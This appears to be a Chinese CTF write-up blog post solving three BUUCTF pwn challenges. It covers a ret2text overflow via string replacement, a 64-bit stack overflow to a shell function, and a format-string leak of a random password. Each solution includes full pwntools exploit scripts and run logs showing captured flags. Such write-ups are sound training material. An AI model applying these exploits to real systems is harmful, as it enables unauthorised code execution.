<h3 id="pwn1-sctf-2016"><a href="#pwn1-sctf-2016" class="headerlink" title="pwn1_sctf_2016"></a>pwn1_sctf_2016</h3><p>checksec一下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       i386-32-little<br>  RELRO:      Partial RELRO<br>  Stack:      No canary found<br>  NX:         NX enabled<br>  PIE:        No PIE (0x8048000)<br>  Stripped:   No<br></code></pre></td></tr></table></figure>

<p>32位程序，NX开启，没法用shellcode</p>
<p>IDA反编译看一下，主要有函数vuln(),replace()和后门函数get_flag()</p>
<p>这下基本确定攻击手段是ret2text</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">vuln</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-type">const</span> <span class="hljs-type">char</span> *v0; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">char</span> s[<span class="hljs-number">32</span>]; <span class="hljs-comment">// [esp+1Ch] [ebp-3Ch] BYREF</span><br>  _BYTE v3[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [esp+3Ch] [ebp-1Ch] BYREF</span><br>  _BYTE v4[<span class="hljs-number">7</span>]; <span class="hljs-comment">// [esp+40h] [ebp-18h] BYREF</span><br>  <span class="hljs-type">char</span> v5; <span class="hljs-comment">// [esp+47h] [ebp-11h] BYREF</span><br>  _BYTE v6[<span class="hljs-number">7</span>]; <span class="hljs-comment">// [esp+48h] [ebp-10h] BYREF</span><br>  _BYTE v7[<span class="hljs-number">5</span>]; <span class="hljs-comment">// [esp+4Fh] [ebp-9h] BYREF</span><br><br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Tell me something about yourself: &quot;</span>);<br>  fgets(s, <span class="hljs-number">32</span>, edata);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::operator=(&amp;input, s);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::allocator(&amp;v5);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::<span class="hljs-built_in">string</span>(v4, <span class="hljs-string">&quot;you&quot;</span>, &amp;v5);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::allocator(v7);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::<span class="hljs-built_in">string</span>(v6, <span class="hljs-string">&quot;I&quot;</span>, v7);<br>  replace((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)v3);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::operator=(&amp;input, v3, v6, v4);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(v3);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(v6);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::~allocator(v7);<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(v4);<br>  <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::~allocator(&amp;v5);<br>  v0 = (<span class="hljs-type">const</span> <span class="hljs-type">char</span> *)<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::c_str((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)&amp;input);<br>  <span class="hljs-built_in">strcpy</span>(s, v0);<br>  <span class="hljs-keyword">return</span> <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;So, %s\n&quot;</span>, s);<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *__stdcall <span class="hljs-title function_">replace</span><span class="hljs-params">(<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *a1, <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *a2, <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *a3)</span><br>&#123;<br>  <span class="hljs-type">int</span> v4; <span class="hljs-comment">// [esp+Ch] [ebp-4Ch]</span><br>  _BYTE v5[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [esp+10h] [ebp-48h] BYREF</span><br>  _BYTE v6[<span class="hljs-number">7</span>]; <span class="hljs-comment">// [esp+14h] [ebp-44h] BYREF</span><br>  <span class="hljs-type">char</span> v7; <span class="hljs-comment">// [esp+1Bh] [ebp-3Dh] BYREF</span><br>  <span class="hljs-type">int</span> v8; <span class="hljs-comment">// [esp+1Ch] [ebp-3Ch]</span><br>  _BYTE v9[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [esp+20h] [ebp-38h] BYREF</span><br>  <span class="hljs-type">int</span> v10; <span class="hljs-comment">// [esp+24h] [ebp-34h] BYREF</span><br>  <span class="hljs-type">int</span> v11; <span class="hljs-comment">// [esp+28h] [ebp-30h] BYREF</span><br>  <span class="hljs-type">char</span> v12; <span class="hljs-comment">// [esp+2Fh] [ebp-29h] BYREF</span><br>  _DWORD v13[<span class="hljs-number">2</span>]; <span class="hljs-comment">// [esp+30h] [ebp-28h] BYREF</span><br>  _BYTE v14[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [esp+38h] [ebp-20h] BYREF</span><br>  <span class="hljs-type">int</span> v15; <span class="hljs-comment">// [esp+3Ch] [ebp-1Ch]</span><br>  _BYTE v16[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [esp+40h] [ebp-18h] BYREF</span><br>  <span class="hljs-type">int</span> v17; <span class="hljs-comment">// [esp+44h] [ebp-14h] BYREF</span><br>  _BYTE v18[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [esp+48h] [ebp-10h] BYREF</span><br>  _BYTE v19[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [esp+4Ch] [ebp-Ch] BYREF</span><br><br>  <span class="hljs-keyword">while</span> ( <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::find(a2, a3, <span class="hljs-number">0</span>) != <span class="hljs-number">-1</span> )<span class="hljs-comment">//只要在字符串a2中能找到符合a3的子串，就一直循环</span><br>  &#123;<br>    <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::allocator(&amp;v7);<br>    v8 = <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::find(a2, a3, <span class="hljs-number">0</span>);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::begin((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)v9);<br>    __gnu_cxx::__normal_iterator&lt;<span class="hljs-type">char</span> *,<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>&gt;::operator+(&amp;v10);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::begin((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)&amp;v11);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::<span class="hljs-built_in">string</span>&lt;__gnu_cxx::__normal_iterator&lt;<span class="hljs-type">char</span> *,<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>&gt;&gt;(v6, v11, v10, &amp;v7);<br>    <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::~allocator(&amp;v7);<br>    <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::allocator(&amp;v12);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::end((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)v13);<br>    v13[<span class="hljs-number">1</span>] = <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::length(a3);<br>    v15 = <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::find(a2, a3, <span class="hljs-number">0</span>);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::begin((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)v16);<br>    __gnu_cxx::__normal_iterator&lt;<span class="hljs-type">char</span> *,<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>&gt;::operator+(v14);<br>    __gnu_cxx::__normal_iterator&lt;<span class="hljs-type">char</span> *,<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>&gt;::operator+(&amp;v17);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::<span class="hljs-built_in">string</span>&lt;__gnu_cxx::__normal_iterator&lt;<span class="hljs-type">char</span> *,<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>&gt;&gt;(v5, v17, v13[<span class="hljs-number">0</span>], &amp;v12);<br>    <span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;::~allocator(&amp;v12);<br>    <span class="hljs-built_in">std</span>::operator+&lt;<span class="hljs-type">char</span>&gt;((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)v19);<br>    <span class="hljs-built_in">std</span>::operator+&lt;<span class="hljs-type">char</span>&gt;((<span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span> *)v18);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::operator=(a2, v18, v5, v4);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(v18);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(v19);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(v5);<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::~<span class="hljs-built_in">string</span>(v6);<br>  &#125;<br>  <span class="hljs-built_in">std</span>::<span class="hljs-built_in">string</span>::<span class="hljs-built_in">string</span>(a1, a2);<br>  <span class="hljs-keyword">return</span> a1;<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">get_flag</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;cat flag.txt&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>代码分析：</p>
<p><em>fgets( )</em></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">char</span> *<span class="hljs-title function_">fgets</span><span class="hljs-params">(<span class="hljs-type">char</span> *str, <span class="hljs-type">int</span> n, FILE *stream)</span>;<br></code></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>str</td>
<td>用于存放读取的内容（缓冲区）</td>
</tr>
<tr>
<td>n</td>
<td>最多读取n-1个字符，最后一个位置用于\0结束字符串</td>
</tr>
<tr>
<td>Stream</td>
<td>文件指针，输入流</td>
</tr>
</tbody></table>
<p>也就是说我们输入的长度被限制在了31，而s的缓冲区有32那么长。</p>
<p><em>replace( )</em></p>
<p>分析代码能得到函数的大致意图：把一个字符串里的所有符合条件的子串替换成别的子串。(GPT分析的，懒得看代码了hhh)</p>
<p><em>vuln( )</em></p>
<p>利用replace（）函数，将s里的”you”换成”I”或者将”I”换成”you”</p>
<p>这样我们就有了一个攻击手段，精准把控I的数量，刚好使字符串经过替换后长度为0x3C + 0x4 （因为s距离ebp为3C，ebp长度为4，想要覆盖返回地址，偏移量就是0x3c + 0x4）。</p>
<p>这个数换算成十进制是64，偏移量为64，我们想到可以用20个I加上4个别的数据，刚好凑成64.</p>
<p>则payload构造就是：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">payload = <span class="hljs-number">20</span> * <span class="hljs-string">b&#x27;I&#x27;</span> + <span class="hljs-number">4</span> * <span class="hljs-string">b&#x27;a&#x27;</span> + p32(get_flag_addr)<br></code></pre></td></tr></table></figure>

<p>get_flag的地址：0x8048f0d</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">p &amp;get_flag</span> <br><span class="hljs-meta prompt_">$</span><span class="language-bash">1 = (&lt;text variable, no debug info&gt; *) 0x8048f0d &lt;get_flag&gt;</span><br></code></pre></td></tr></table></figure>

<p>则完整的exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote (<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26810</span>)<br>get_flag_addr = <span class="hljs-number">0x8048f0d</span><br>payload = <span class="hljs-number">20</span> * <span class="hljs-string">b&#x27;I&#x27;</span> + <span class="hljs-number">4</span> * <span class="hljs-string">b&#x27;a&#x27;</span> + p32(get_flag_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行程序，也是拿到flag了</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs shell">ghostfoxy@ghostfoxy:~/CTF$ python3 exp.py<br>[+] Opening connection to node5.buuoj.cn on port 26810: Done<br>[DEBUG] Sent 0x1d bytes:<br>    00000000  49 49 49 49  49 49 49 49  49 49 49 49  49 49 49 49  │IIII│IIII│IIII│IIII│<br>    00000010  49 49 49 49  61 61 61 61  0d 8f 04 08  0a           │IIII│aaaa│····│·│<br>    0000001d<br>[*] Switching to interactive mode<br>[DEBUG] Received 0x2b bytes:<br>    b&#x27;flag&#123;3a443b2c-a4c6-4dda-91ce-4a2064c41726&#125;\n&#x27;<br>flag&#123;3a443b2c-a4c6-4dda-91ce-4a2064c41726&#125;<br>[DEBUG] Received 0x2b bytes:<br>    b&#x27;timeout: the monitored command dumped core\n&#x27;<br>timeout: the monitored command dumped core<br>[*] Got EOF while reading in interactive<br></code></pre></td></tr></table></figure>



<h3 id="level0"><a href="#level0" class="headerlink" title="level0"></a>level0</h3><p>checksec</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>  RELRO:      No RELRO<br>  Stack:      No canary found<br>  NX:         NX enabled<br>  PIE:        No PIE (0x400000)<br>  Stripped:   No<br></code></pre></td></tr></table></figure>

<p>64位程序，NX开启</p>
<p>IDA查看源代码，大跌眼镜：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">ssize_t</span> <span class="hljs-title function_">vulnerable_function</span><span class="hljs-params">()</span><br>&#123;<br>  _BYTE buf[<span class="hljs-number">128</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-80h] BYREF</span><br><br>  <span class="hljs-keyword">return</span> read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0x200u</span>LL);<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">callsystem</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>出题人属于是把shell都塞你嘴里了都</p>
<p>读取200字符，buf长度为128，明显栈溢出。</p>
<p>buf距离栈底0x80，rbp长度为8，偏移量为128 + 8 &#x3D; 136</p>
<p>callsystem的地址：0x400596</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">p &amp;callsystem</span> <br><span class="hljs-meta prompt_">$</span><span class="language-bash">1 = (&lt;text variable, no debug info&gt; *) 0x400596 &lt;callsystem&gt;</span><br></code></pre></td></tr></table></figure>

<p>找个ret的地址以防万一：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs shell">ghostfoxy@ghostfoxy:~/CTF$ ROPgadget --binary level0 --only &quot;ret&quot;<br>Gadgets information<br>============================================================<br>0x0000000000400431 : ret<br>0x0000000000400462 : ret 0x2005<br><br>Unique gadgets found: 2<br></code></pre></td></tr></table></figure>

<p>查到ret的地址：0x400431</p>
<p>构造payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">27423</span>)<br>offset = <span class="hljs-number">136</span><br>system_addr = <span class="hljs-number">0x400596</span><br>ret_addr = <span class="hljs-number">0x400431</span><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span> * offset + p64(ret_addr) + p64(system_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行程序后拿到flag：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs shell">ghostfoxy@ghostfoxy:~/CTF$ python3 exp.py<br>[+] Opening connection to node5.buuoj.cn on port 27423: Done<br>[DEBUG] Sent 0x99 bytes:<br>    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│<br>    *<br>    00000080  61 61 61 61  61 61 61 61  31 04 40 00  00 00 00 00  │aaaa│aaaa│1·@·│····│<br>    00000090  96 05 40 00  00 00 00 00  0a                        │··@·│····│·│<br>    00000099<br>[*] Switching to interactive mode<br>[DEBUG] Received 0xd bytes:<br>    b&#x27;Hello, World\n&#x27;<br>Hello, World<br><span class="hljs-meta prompt_">$ </span><span class="language-bash"><span class="hljs-built_in">cat</span> flag</span><br>[DEBUG] Sent 0x9 bytes:<br>    b&#x27;cat flag\n&#x27;<br>[DEBUG] Received 0x2b bytes:<br>    b&#x27;flag&#123;9ec3ca05-16df-4bff-bb25-7e36ab92597d&#125;\n&#x27;<br>flag&#123;9ec3ca05-16df-4bff-bb25-7e36ab92597d&#125;<br></code></pre></td></tr></table></figure>

<h3 id="第五空间2019-决赛-PWN5"><a href="#第五空间2019-决赛-PWN5" class="headerlink" title="[第五空间2019 决赛]PWN5"></a>[第五空间2019 决赛]PWN5</h3><p>checksec一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       i386-32-little<br>  RELRO:      Partial RELRO<br>  Stack:      Canary found<br>  NX:         NX enabled<br>  PIE:        No PIE (0x8048000)<br></code></pre></td></tr></table></figure>

<p>32位程序，存在金丝雀，无法利用栈溢出</p>
<p>IDA打开观察源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> __cdecl <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> a1)</span><br>&#123;<br>  <span class="hljs-type">time_t</span> v1; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">int</span> result; <span class="hljs-comment">// eax</span><br>  <span class="hljs-type">int</span> fd; <span class="hljs-comment">// [esp+0h] [ebp-84h]</span><br>  <span class="hljs-type">char</span> nptr[<span class="hljs-number">16</span>]; <span class="hljs-comment">// [esp+4h] [ebp-80h] BYREF</span><br>  <span class="hljs-type">char</span> buf[<span class="hljs-number">100</span>]; <span class="hljs-comment">// [esp+14h] [ebp-70h] BYREF</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v6; <span class="hljs-comment">// [esp+78h] [ebp-Ch]</span><br>  <span class="hljs-type">int</span> *v7; <span class="hljs-comment">// [esp+7Ch] [ebp-8h]</span><br><br>  v7 = &amp;a1;<br>  v6 = __readgsdword(<span class="hljs-number">0x14u</span>);<br>  setvbuf(<span class="hljs-built_in">stdout</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>);<br>  v1 = time(<span class="hljs-number">0</span>);<br>  srand(v1);<br>  fd = open(<span class="hljs-string">&quot;/dev/urandom&quot;</span>, <span class="hljs-number">0</span>); <span class="hljs-comment">//生成随机数读入变量fd</span><br>  read(fd, &amp;dword_804C044, <span class="hljs-number">4u</span>); <span class="hljs-comment">//读取fd的前4个字节到变量dword</span><br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;your name:&quot;</span>);<br>  read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0x63u</span>); <span class="hljs-comment">//读入buf</span><br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Hello,&quot;</span>);<br>  <span class="hljs-built_in">printf</span>(buf); <span class="hljs-comment">//漏洞点，格式化字符串</span><br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;your passwd:&quot;</span>);<br>  read(<span class="hljs-number">0</span>, nptr, <span class="hljs-number">0xFu</span>);<br>  <span class="hljs-keyword">if</span> ( atoi(nptr) == dword_804C044 )<br>  &#123;<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;ok!!&quot;</span>);<br>    system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>  &#125;<span class="hljs-comment">//函数atoi()是将字符串转换为数字形式</span><br>  <span class="hljs-keyword">else</span><br>  &#123;<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;fail&quot;</span>);<br>  &#125;<br>  result = <span class="hljs-number">0</span>;<br>  <span class="hljs-keyword">if</span> ( __readgsdword(<span class="hljs-number">0x14u</span>) != v6 )<br>    sub_80493D0();<br>  <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>通过代码分析可得，程序主要漏洞是格式化字符串漏洞</p>
<p>既然不能利用栈溢出，那么解决方案就放在了密码dword上，因为dword时随机数，要么输入正确的密码，要么篡改dword</p>
<p>看一下输入的buf是printf的第几个参数：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">your name:<br><span class="hljs-meta prompt_">AAAA-%</span><span class="language-bash">p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p</span><br></code></pre></td></tr></table></figure>

<p>%p的功能是泄漏某个变量在栈上的地址，能用来确定偏移量</p>
<p>得到输出结果</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">Hello,AAAA-0xffc20f88-0x63-(nil)-0xf7f1bba0-0x3-0xf7edc7b0-0x1-(nil)-0x1-0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d<br></code></pre></td></tr></table></figure>

<p>我们知道AAAA的十六进制格式是0x41414141，数一下，发现AAAA位于第11个参数，偏移量为10</p>
<p>查看ida发现变量dword的地址是0x804c044</p>
<p>利用%10$s泄漏dword的值</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26163</span>)<br>dword_addr = <span class="hljs-number">0x804c044</span><br>payload = p32(dword_addr) + <span class="hljs-string">b&#x27;%10$s&#x27;</span> <br>p.sendline(payload)<br>p.recvuntil(<span class="hljs-string">b&quot;Hello,&quot;</span> + p32(dword_addr)) <span class="hljs-comment">#dword的地址也会被解析成字符串输出，所以输出的地址之后才是我们需要的4字节密码</span><br>random_bytes = p.recv(<span class="hljs-number">4</span>)<br>num = u32(random_bytes) <span class="hljs-comment">#将小端序格式的密码解码为数字</span><br>p.sendlineafter(<span class="hljs-string">b&quot;your passwd:&quot;</span>,<span class="hljs-built_in">str</span>(num))<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行代码，打通了，拿到了shell</p>
<p>还有另一种办法是，篡改dword的值，这时候我们需要%n格式化字符串来解决这个问题。</p>
<p>%n的功能是将printf函数已经输出的字符串字节长度输入到目标地址上。</p>
